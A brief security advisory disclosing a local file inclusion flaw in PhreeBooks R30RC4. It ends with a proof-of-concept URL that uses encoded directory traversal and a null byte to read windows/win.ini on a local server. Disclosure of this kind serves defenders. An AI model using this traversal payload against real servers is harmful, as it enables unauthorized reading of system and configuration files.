PhreeBooks version R30RC4 suffers from a local file inclusion vulnerability.
b7c5789bbb2921bd6de523d5ab79a940339fabdeb8d94853c552e0b3e515caf1
------------------------------------------------------------------------
Software................PhreeBooks R30RC4
Vulnerability...........Local File Inclusion
Download................http://sourceforge.net/projects/phreebooks
Release Date............2/22/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------
--PoC--
http://localhost/phreedom/index.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2fwin.ini%00